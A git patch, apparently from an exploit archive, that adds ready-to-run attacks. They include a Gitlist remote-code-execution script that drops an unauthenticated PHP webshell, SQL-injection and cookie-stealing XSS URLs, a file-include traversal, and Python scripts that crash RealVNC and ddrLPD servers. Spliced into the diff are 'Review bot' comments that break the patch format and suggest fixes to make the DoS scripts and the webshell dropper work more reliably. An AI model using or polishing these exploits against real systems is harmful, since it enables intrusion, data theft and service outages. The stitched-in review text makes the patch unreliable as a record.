From 48fef00530a1a0d915e031f8887fa5b018c543a9 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 1 Jul 2014 04:39:53 +0000
Subject: [PATCH] Updated 07_01_2014
---
 files.csv | 16 +++++++
 platforms/asp/webapps/33923.txt | 7 +++
 platforms/cfm/webapps/33916.txt | 9 ++++
 platforms/multiple/remote/33929.py | 45 ++++++++++++++++++
 platforms/php/remote/33920.php | 16 +++++++
 platforms/php/webapps/33913.html | 11 +++++
 platforms/php/webapps/33914.txt | 12 +++++
 platforms/php/webapps/33915.txt | 9 ++++
 platforms/php/webapps/33917.txt | 11 +++++
 platforms/php/webapps/33918.txt | 9 ++++
 platforms/php/webapps/33919.txt | 15 ++++++
 platforms/php/webapps/33921.txt | 9 ++++
 platforms/php/webapps/33922.txt | 10 ++++
 platforms/php/webapps/33925.txt | 9 ++++
 platforms/php/webapps/33927.txt | 7 +++
 platforms/windows/dos/33924.py | 74 ++++++++++++++++++++++++++++++
 platforms/windows/dos/33926.py | 66 ++++++++++++++++++++++++++
 17 files changed, 335 insertions(+)
 create mode 100755 platforms/asp/webapps/33923.txt
 create mode 100755 platforms/cfm/webapps/33916.txt
 create mode 100755 platforms/multiple/remote/33929.py
 create mode 100755 platforms/php/remote/33920.php
 create mode 100755 platforms/php/webapps/33913.html
 create mode 100755 platforms/php/webapps/33914.txt
 create mode 100755 platforms/php/webapps/33915.txt
 create mode 100755 platforms/php/webapps/33917.txt
 create mode 100755 platforms/php/webapps/33918.txt
 create mode 100755 platforms/php/webapps/33919.txt
 create mode 100755 platforms/php/webapps/33921.txt
 create mode 100755 platforms/php/webapps/33922.txt
 create mode 100755 platforms/php/webapps/33925.txt
 create mode 100755 platforms/php/webapps/33927.txt
 create mode 100755 platforms/windows/dos/33924.py
 create mode 100755 platforms/windows/dos/33926.py
diff --git a/files.csv b/files.csv
index 8bc0bb28b..189cbef44 100755
--- a/files.csv
+++ b/files.csv
@@ -30543,3 +30543,19 @@ id,file,description,date,author,platform,type,port
 33907,platforms/multiple/remote/33907.txt,"ZKSoftware 'ZK5000' Remote Information Disclosure Vulnerability",2010-03-20,fb1h2s,multiple,remote,0
 33908,platforms/php/webapps/33908.txt,"Your Articles Directory Login Option SQL Injection Vulnerability",2010-04-29,Sid3^effects,php,webapps,0
 33909,platforms/php/webapps/33909.txt,"Tele Data's Contact Management Server 0.9 'username' Parameter SQL Injection Vulnerability",2010-04-28,"John Leitch",php,webapps,0
+33913,platforms/php/webapps/33913.html,"osCommerce 3.0a5 Local File Include and HTML Injection Vulnerabilities",2010-04-30,"Jordi Chancel",php,webapps,0
+33914,platforms/php/webapps/33914.txt,"4xcms 'login.php' Multiple SQL Injection Vulnerabilities",2010-03-21,"cr4wl3r ",php,webapps,0
+33915,platforms/php/webapps/33915.txt,"Campsite 3.x 'article_id' Parameter SQL Injection Vulnerability",2010-04-30,"Stefan Esser",php,webapps,0
+33916,platforms/cfm/webapps/33916.txt,"Mango Blog 1.4.1 'archives.cfm/search' Cross Site Scripting Vulnerability",2010-05-03,MustLive,cfm,webapps,0
+33917,platforms/php/webapps/33917.txt,"Billwerx RC5.2.2 PL2 'primary_number' Parameter SQL Injection Vulnerability",2010-05-02,indoushka,php,webapps,0
+33918,platforms/php/webapps/33918.txt,"CF Image Hosting Script 1.1 'upload.php' Arbitrary File Upload Vulnerability",2010-05-01,The.Morpheus,php,webapps,0
+33919,platforms/php/webapps/33919.txt,"NolaPro Enterprise 4.0.5538 Cross Site Scripting and SQL Injection Vulnerabilities",2010-05-01,ekse,php,webapps,0
+33920,platforms/php/remote/33920.php,"PHP 5.3 'php_dechunk()' HTTP Chunked Encoding Integer Overflow Vulnerability",2010-05-02,"Stefan Esser",php,remote,0
+33921,platforms/php/webapps/33921.txt,"IslamSound Multiple Remote SQL Injection Vulnerabilities",2010-05-03,JIKO,php,webapps,0
+33922,platforms/php/webapps/33922.txt,"CH-CMS.ch 2 Multiple Arbitrary File Upload Vulnerabilities",2010-03-15,EL-KAHINA,php,webapps,0
+33923,platforms/asp/webapps/33923.txt,"SamaGraph CMS 'inside.aspx' SQL Injection Vulnerability",2010-03-11,K053,asp,webapps,0
+33924,platforms/windows/dos/33924.py,"RealVNC 4.1.3 'ClientCutText' Message Remote Denial of Service Vulnerability",2010-05-02,"John Leitch",windows,dos,0
+33925,platforms/php/webapps/33925.txt,"ecoCMS 18.4.2010 'admin.php' Cross Site Scripting Vulnerability",2010-05-18,"High-Tech Bridge SA",php,webapps,0
+33926,platforms/windows/dos/33926.py,"ddrLPD 1.0 Remote Denial of Service Vulnerability",2010-04-29,"Bisphemol A",windows,dos,0
+33927,platforms/php/webapps/33927.txt,"eZoneScripts Apartment Search Script 'listtest.php' SQL Injection Vulnerability",2010-02-09,JIKO,php,webapps,0
+33929,platforms/multiple/remote/33929.py,"Gitlist <= 0.4.0 - Remote Code Execution",2014-06-30,drone,multiple,remote,0
diff --git a/platforms/asp/webapps/33923.txt b/platforms/asp/webapps/33923.txt
new file mode 100755
index 000000000..40fdd6a2f
--- /dev/null
+++ b/platforms/asp/webapps/33923.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/39892/info
+
+SamaGraph CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/inside.aspx?g=' or '1'='1'--
\ No newline at end of file
diff --git a/platforms/cfm/webapps/33916.txt b/platforms/cfm/webapps/33916.txt
new file mode 100755
index 000000000..e1b9c76f9
--- /dev/null
+++ b/platforms/cfm/webapps/33916.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/39864/info
+
+Mango Blog is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Versions prior to Mango Blog 1.4.2 are vulnerable.
+
+http://www.example.com/archives.cfm/search/?term=%3Cbody%20onload=alert(document.cookie)%3E
\ No newline at end of file
diff --git a/platforms/multiple/remote/33929.py b/platforms/multiple/remote/33929.py
new file mode 100755
index 000000000..e9f247f3b
--- /dev/null
+++ b/platforms/multiple/remote/33929.py
@@ -0,0 +1,45 @@
+from commands import getoutput
+import urllib
+import sys
+
+"""
+Exploit Title: Gitlist <= 0.4.0 anonymous RCE
+Date: 06/20/2014
+Author: drone (@dronesec)
+Vendor Homepage: http://gitlist.org/
+Software link: https://s3.amazonaws.com/gitlist/gitlist-0.4.0.tar.gz
+Version: <= 0.4.0
+Fixed in: 0.5.0
+Tested on: Debian 7
+More information: http://hatriot.github.io/blog/2014/06/29/gitlist-rce/
+cve: CVE-2014-4511
+"""
+
+if len(sys.argv) <= 1:
+ print '%s: [url to git repo] {cache path}' % sys.argv[0]
+ print ' Example: python %s http://localhost/gitlist/my_repo.git' % sys.argv[0]
+ print ' Example: python %s http://localhost/gitlist/my_repo.git /var/www/git/cache' % sys.argv[0]
+ sys.exit(1)
+
+url = sys.argv[1]
+url = url if url[-1] != '/' else url[:-1]
+
+path = "/var/www/gitlist/cache"
+if len(sys.argv) > 2:
+ path = sys.argv[2]
+
+print '[!] Using cache location %s' % path
+
+# payload
+payload = "PD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo="
+
+# sploit; python requests does not like this URL, hence wget is used
+mpath = '/blame/master/""`echo {0}|base64 -d > {1}/x.php`'.format(payload, path)
+mpath = url+ urllib.quote(mpath)
+
+out = getoutput("wget %s" % mpath)
+if '500' in out:
+ print '[!] Shell dropped; go hit %s/cache/x.php?cmd=ls' % url.rsplit('/', 1)[0]
+else:
+ print '[-] Failed to drop'
+ print out
diff --git a/platforms/php/remote/33920.php b/platforms/php/remote/33920.php
new file mode 100755
index 000000000..bf0552716
--- /dev/null
+++ b/platforms/php/remote/33920.php
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/39877/info
+
+PHP is prone to a remote integer-overflow vulnerability.
+
+An attacker can exploit this issue to execute arbitrary code in the context of the PHP process. Failed exploit attempts will result in a denial-of-service condition.
+
+PHP 5.3.0 through 5.3.2 are vulnerable; other versions may also be affected.
+
+
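Review bot: `out = getoutput("wget %s" % mpath)` near the end of the hunk hands the operator-supplied `url` (and `path`, folded into `mpath`) to a shell unquoted, so a repository URL or cache path containing shell metacharacters executes on the tester's own machine rather than the target; `commands.getoutput` is also Python 2 only, matching the `print` statements. Replace it with `out = subprocess.Popen(['wget', mpath], stdout=subprocess.PIPE, stderr=subprocess.STDOUT).communicate()[0]` (plus `import subprocess`), which passes the URL as a single argv element. Two smaller points: `url[-1]` raises `IndexError` on an empty first argument, and `'500' in out` treats any wget output containing "500" (a byte count, part of the URL) as success, so printing `out` on the success branch as well would help triage. The dropped `x.php` appears to decode to a `system($_GET['cmd'])` one-liner with no authentication, so a comment such as `# NOTE: x.php is an unauthenticated webshell in the cache dir; remove it when the engagement ends` belongs above the `payload` line.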
diff --git a/platforms/php/webapps/33913.html b/platforms/php/webapps/33913.html
new file mode 100755
index 000000000..9c010ccb1
--- /dev/null
+++ b/platforms/php/webapps/33913.html
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/39820/info
+
+osCommerce is prone to a local file-include vulnerability and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit the local file-include vulnerability using directory-traversal strings to execute local files within the context of the webserver process.
+
+The attacker may leverage the HTML-injection issue to execute arbitrary HTML and script code in the context of the affected browser. This may let the attacker steal cookie-based authentication credentials or control how the site is rendered to the user.
+
+osCommerce 3.0a5 is affected; other versions may also be vulnerable.
+
+http://www.example.com/admin/includes/applications/services/pages/uninstall.php?module=../../../../../../../../cmd
\ No newline at end of file
diff --git a/platforms/php/webapps/33914.txt b/platforms/php/webapps/33914.txt
new file mode 100755
index 000000000..f6e5cdd6c
--- /dev/null
+++ b/platforms/php/webapps/33914.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/39840/info
+
+4xcms is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+4xcms r26 is vulnerable; other versions may also be affected.
+
+The following example data is available:
+
+User: ' or '1=1
+Pass: ' or '1=1
\ No newline at end of file
diff --git a/platforms/php/webapps/33915.txt b/platforms/php/webapps/33915.txt
new file mode 100755
index 000000000..789e787d7
--- /dev/null
+++ b/platforms/php/webapps/33915.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/39862/info
+
+Campsite is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Campsite versions 3.2 through 3.3.5 are vulnerable; other versions may also be affected.
+
+http://www.example.com/javascript/tinymce/plugins/campsiteattachment/attachments.php?article_id=0+UNION+SELECT+Id,2,concat%28UName,0x2e,Password%29,4,5,6,7,8,9,10,11,12+FROM+liveuser_users+--+x
\ No newline at end of file
diff --git a/platforms/php/webapps/33917.txt b/platforms/php/webapps/33917.txt
new file mode 100755
index 000000000..e559a9d14
--- /dev/null
+++ b/platforms/php/webapps/33917.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/39867/info
+
+Billwerx is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Billwerx RC5.2.2 PL2 is vulnerable; other versions may also be affected.
+
+The following example URI is available:
+
+http://www.example.com/billwerx_rc522_pl2/request_account.php?campaign_id=1&group_id=6&interest_id=6&first_name=indoushka&last_name=indoushka&company_name=indoushka&home_number=indoushka&get_primary=indoushka&work_number=indoushka&mobile_number=indoushka&email_address=indoushka&comments=indoushka&request=REQUEST&close=CLOSE&primary_number=' [(SQL)]
\ No newline at end of file
diff --git a/platforms/php/webapps/33918.txt b/platforms/php/webapps/33918.txt
new file mode 100755
index 000000000..12264a751
--- /dev/null
+++ b/platforms/php/webapps/33918.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/39870/info
+
+CF Image Hosting Script is prone to an arbitrary-file-upload vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+CF Image Hosting Script 1.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/upload.php
\ No newline at end of file
diff --git a/platforms/php/webapps/33919.txt b/platforms/php/webapps/33919.txt
new file mode 100755
index 000000000..8bfcd65e0
--- /dev/null
+++ b/platforms/php/webapps/33919.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/39875/info
+
+NolaPro Enterprise is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+NolaPro Enterprise 4.0.5538 is vulnerable; other versions may also be affected.
+
+http/www.example.com/sidemenu.php?index=1&menutitle=%3Cscript%3Ealert%28String.fromCharCode%2888,83,83,32,102,111,117,110,100,32,98,121,32,67,111,114,101,108,97,11
+0,32,84,101,97,109%29%29;%3C/script%3E&menutitleorig=STR_ORDERS
+
+http://www.example.om/nporderitemremote.php?pos_mode=1¤cy=USD&curdate=2010-04-12&linenum=%3Cscript%3Ealert%28String.fromCharCode%2888,83,83,32,102,111,117,110
+,100,32,98,121,32,67,111,114,101,108,97,110,32,84,101,97,109%29%29;%3C/script%3E&inventorylocationid=1&customerid=&shiptoid=0
+
+1 or BENCHMARK(2500000,MD5(1))
diff --git a/platforms/php/webapps/33921.txt b/platforms/php/webapps/33921.txt
new file mode 100755
index 000000000..99b0e8c2b
--- /dev/null
+++ b/platforms/php/webapps/33921.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/39880/info
+
+IslamSound is prone to multiple remote SQL injection vulnerabilities.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/sound.php?catid=2 sql
+http://www.example.com/details.php?linkid=-7 union select user(),1,2,database(),version(),5,6,7,8--
+http://www.example.com/send.php?linkid=-5 union select user(),1,2,3,4,5,6,7,8--
\ No newline at end of file
diff --git a/platforms/php/webapps/33922.txt b/platforms/php/webapps/33922.txt
new file mode 100755
index 000000000..37d0c5cc9
--- /dev/null
+++ b/platforms/php/webapps/33922.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/39888/info
+
+CH-CMS.ch is prone to multiple arbitrary-file-upload vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these vulnerabilities to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+CH-CMS.ch 2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/Final/login/ava_up1.php
+http://www.example.com/Final/login/ava_up12.php
\ No newline at end of file
diff --git a/platforms/php/webapps/33925.txt b/platforms/php/webapps/33925.txt
new file mode 100755
index 000000000..3208e50b3
--- /dev/null
+++ b/platforms/php/webapps/33925.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/39901/info
+
+ecoCMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+ecoCMS 18.04.2010 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/admin.php?p=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
diff --git a/platforms/php/webapps/33927.txt b/platforms/php/webapps/33927.txt
new file mode 100755
index 000000000..6c5cc2cc5
--- /dev/null
+++ b/platforms/php/webapps/33927.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/39905/info
+
+eZoneScripts Apartment Search Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/productdemos/ApartmentSearch/listtest.php?r=-1 union select 0,user()--
\ No newline at end of file
diff --git a/platforms/windows/dos/33924.py b/platforms/windows/dos/33924.py
new file mode 100755
index 000000000..a6ae9b3bd
--- /dev/null
+++ b/platforms/windows/dos/33924.py
@@ -0,0 +1,74 @@
+source: http://www.securityfocus.com/bid/39895/info
+
+RealVNC Viewer is prone to a remote denial-of-service vulnerability.
+
+An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
+
+RealVNC 4.1.3 is vulnerable; other versions may also be affected.
+
+import sys, struct, socket
+host ='localhost'
+port = 5900
+
+def crash_vnc_server():
+ try:
+ while 1:
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.connect((host, port))
+ s.settimeout(1.0)
+
+ print 'Connected'
+
+ try:
+ b = s.recv(8192)
+ print 'ProtocolVersion Received'
+
+ s.send(b)
+ print 'ProtocolVersion Sent'
+
+ b = s.recv(8192)
+ print 'Security Received'
+
+ s.send('\x01')
+ print 'Security Sent'
+
+ # Recv SecurityResult
+ b = s.recv(8192)
+ print 'SecurityResult Received'
+
+ if (len(b) == 4 and
+ b[0] == chr(0) and
+ b[1] == chr(0) and
+ b[2] == chr(0) and
+ b[3] == chr(0)):
+ print 'SecurityResult OK'
+ else:
+ print 'SecurityResult Failed.\n\nThe server must be set '\
+ 'to No Authentication for this to work, otherwise '\
+ 'you \'ll need to write the necessary client side '\
+ 'authentication code yourself.'
+ return
+
+ s.send('\x01')
+ print 'ClientInit Sent'
+
+ b = s.recv(8192)
+ print 'ServerInit Received'
+
+ text_len = 0xFFFFFF
+ text_str = struct.pack('L', text_len) + '\xAA' * text_len
+
+ while 1:
+ s.send('\x06\x00\x00\x00' + text_str)
+
+ print 'ClientCutText Sent'
+
+ except Exception:
+ print 'Connection closed'
+
+ except Exception:
+ print 'Couldn\'t connect'
+
+crash_vnc_server()
+
+
diff --git a/platforms/windows/dos/33926.py b/platforms/windows/dos/33926.py
new file mode 100755
index 000000000..ef4c8368c
--- /dev/null
+++ b/platforms/windows/dos/33926.py
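Review bot: `text_str = struct.pack('L', text_len) + '\xAA' * text_len` encodes the ClientCutText length in native byte order and native size, so on a little-endian 64-bit interpreter it emits eight bytes (`ff ff ff 00 00 00 00 00`) and on 32-bit four little-endian bytes, while the RFB message layout after `'\x06\x00\x00\x00'` expects a single big-endian U32; what the server actually parses as the length therefore depends on the host running the PoC. If the crash is meant to come from a declared length far larger than the body (little-endian `0xFFFFFF` reads as ~4 GB), say so and pin it with `struct.pack('>I', 0xFFFFFF00)`; if it is meant to be a genuine 16 MB message, use `struct.pack('>I', text_len)`. The `s.send(...)` calls may also return after a partial write of the ~16 MB buffer, so `s.sendall(...)` is the right call, and the socket is never closed before the outer `while 1` opens the next one. A short comment above the handshake stating that the script echoes the server's version string back (`s.send(b)`) and selects security type 1 (None) would let a reader follow the flow without the RFB spec.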
@@ -0,0 +1,66 @@
+source: http://www.securityfocus.com/bid/39904/info
+
+ddrLPD is prone to a remote denial-of-service vulnerability.
+
+An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
+
+ddrLPD 1.0 is vulnerable; other versions may also be affected.
+
+#==================================================================================================#
+# #
+# $$$$$$$\ $$\ $$\ $$\ $$$$$$\ #
+# $$ __$$\ \__| $$ | $$ | $$ __$$\ #
+# $$ | $$ |$$\ $$$$$$$\ $$$$$$\ $$$$$$$\ $$$$$$\ $$$$$$$\ $$$$$$\ $$ | $$ / $$ | #
+# $$$$$$$\ |$$ |$$ _____|$$ __$$\ $$ __$$\ $$ __$$\ $$ __$$\ $$ __$$\ $$ | $$$$$$$$ | #
+# $$ __$$\ $$ |\$$$$$$\ $$ / $$ |$$ | $$ |$$$$$$$$ |$$ | $$ |$$ / $$ |$$ | $$ __$$ | #
+# $$ | $$ |$$ | \____$$\ $$ | $$ |$$ | $$ |$$ ____|$$ | $$ |$$ | $$ |$$ | $$ | $$ | #
+# $$$$$$$ |$$ |$$$$$$$ |$$$$$$$ |$$ | $$ |\$$$$$$$\ $$ | $$ |\$$$$$$ |$$ | $$ | $$ | #
+# \_______/ \__|\_______/ $$ ____/ \__| \__| \_______|\__| \__| \______/ \__| \__| \__| #
+# $$ | #
+# $$ | Plastics Make It Possible #
+# \__| #
+# #
+#==================================================================================================#
+# #
+# Vulnerability............Denial-of-Service #
+# Software.................ddrLPD 1.0 #
+# Download.................http://ddr.web.id/files/ddrLPDsetup.exe #
+# Date.....................4/29/10 #
+# #
+#==================================================================================================#
+# #
+# Site.....................http://cross-site-scripting.blogspot.com/ #
+# Email....................john.leitch5@gmail.com #
+# #
+#==================================================================================================#
+# #
+# ##Description## #
+# #
+# Sending packets composed of bytes between 1 and 5 (inclusive) causes the the server to crash. #
+# #
+# ddrlpd.exe: The instruction at 0x50431A referenced memory at 0x0. The memory could not be read #
+# (0x0050431A -> 00000000) #
+# #
+# ##Proof of Concept## #
+import socket
+host ='localhost'
+
+try:
+ while 1:
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.connect((host, 515))
+ s.settimeout(1.0)
+
+ print 'connected',
+
+ try:
+ while 1:
+ s.send('\x01'*8192)
+ print '.',
+ except Exception:
+ print '\nconnection closed'
+ pass
+
+except Exception:
+ print 'couldn\'t connect'
+
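Review bot: `s.send('\x01'*8192)` in the inner `while 1` can return after a partial write, and when the inner loop exits on an exception the socket is abandoned without `close()` before the outer loop connects again, so a long run leaks descriptors until the interpreter collects them; use `s.sendall('\x01'*8192)` and add `s.close()` in the `except Exception:` branch in place of the dead `pass` that follows the print. The header comment says any byte value from 1 to 5 triggers the crash but the PoC only ever sends `\x01`; a one-line comment such as `# any byte 1-5 triggers it; 0x01 chosen arbitrarily` above the send would tie the two together (the comment also reads "the the server"). `host` is hard-coded to `'localhost'` with no `sys.argv` handling, unlike 33929.py in the same commit, which is worth noting in the usage header.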